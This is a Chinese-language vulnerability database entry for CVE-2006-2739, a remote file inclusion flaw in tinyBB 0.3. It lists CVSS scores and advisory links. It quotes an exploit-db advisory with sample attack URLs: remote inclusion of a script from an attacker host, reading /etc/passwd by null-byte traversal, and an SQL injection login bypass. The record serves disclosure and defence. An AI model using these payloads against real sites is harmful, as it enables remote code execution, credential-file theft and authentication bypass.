CVE-2006-2739
CVSS5.1
发布时间 :2006-06-01 06:02:00
修订时间 :2011-03-07 21:36:56
NMCOE    

[原文]PHP remote file inclusion vulnerability in footers.php in Epicdesigns tinyBB 0.3, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the tinybb_footers parameter.


[CNNVD]Epicdesigns tinyBB footers.php PHP远程文件包含漏洞(CNNVD-200606-028)

        tinyBB是一款简单小巧的开源论坛程序。
        Epicdesigns tinyBB 0.3的 footers.php 存在的PHP远程文件包含漏洞,当register_globals被启用时,远程攻击者利用 tinybb_footers 参数中的一个URL执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2739
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2739
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-028
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2035
(UNKNOWN)  VUPEN  ADV-2006-2035
http://www.securityfocus.com/bid/18147
(UNKNOWN)  BID  18147
http://www.securityfocus.com/archive/1/archive/1/487311/100/200/threaded
(UNKNOWN)  BUGTRAQ  20080130 tinyBB v0.2 Message Board Remote File Inc.
http://www.securityfocus.com/archive/1/archive/1/435281/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060528 Advisory: tinyBB <= 0.3 Multiple Remote Vulnerabilities.
http://www.nukedx.com/?viewdoc=33
(VENDOR_ADVISORY)  MISC  http://www.nukedx.com/?viewdoc=33
http://www.nukedx.com/?getxpl=33
(VENDOR_ADVISORY)  MISC  http://www.nukedx.com/?getxpl=33
http://securitytracker.com/id?1016172
(UNKNOWN)  SECTRACK  1016172
http://secunia.com/advisories/20356
(VENDOR_ADVISORY)  SECUNIA  20356
http://xforce.iss.net/xforce/xfdb/26824
(UNKNOWN)  XF  tinybb-footers-file-include(26824)
http://securityreason.com/securityalert/1011
(UNKNOWN)  SREASON  1011

- 漏洞信息

Epicdesigns tinyBB footers.php PHP远程文件包含漏洞
中危 输入验证
2006-06-01 00:00:00 2009-09-15 00:00:00
远程  
        tinyBB是一款简单小巧的开源论坛程序。
        Epicdesigns tinyBB 0.3的 footers.php 存在的PHP远程文件包含漏洞,当register_globals被启用时,远程攻击者利用 tinybb_footers 参数中的一个URL执行任意PHP代码。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.epicdesigns.co.uk/

- 漏洞信息 (1839)

tinyBB <= 0.3 Remote (Include / SQL Injection) Vulnerabilities (EDBID:1839)
php webapps
2006-05-28 Verified
0 nukedx
N/A [点击下载]
tinyBB <= 0.3 Multiple Remote Vulnerabilities
Method found by nukedx,
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on tinyBB <= 0.3
Original advisory can be found at: http://www.nukedx.com/?viewdoc=33
http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?
http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00
SQL injection on login.php
http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing
# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-28]
		

- 漏洞信息

26094
tinyBB footers.php tinybb_footers Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-05-28 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站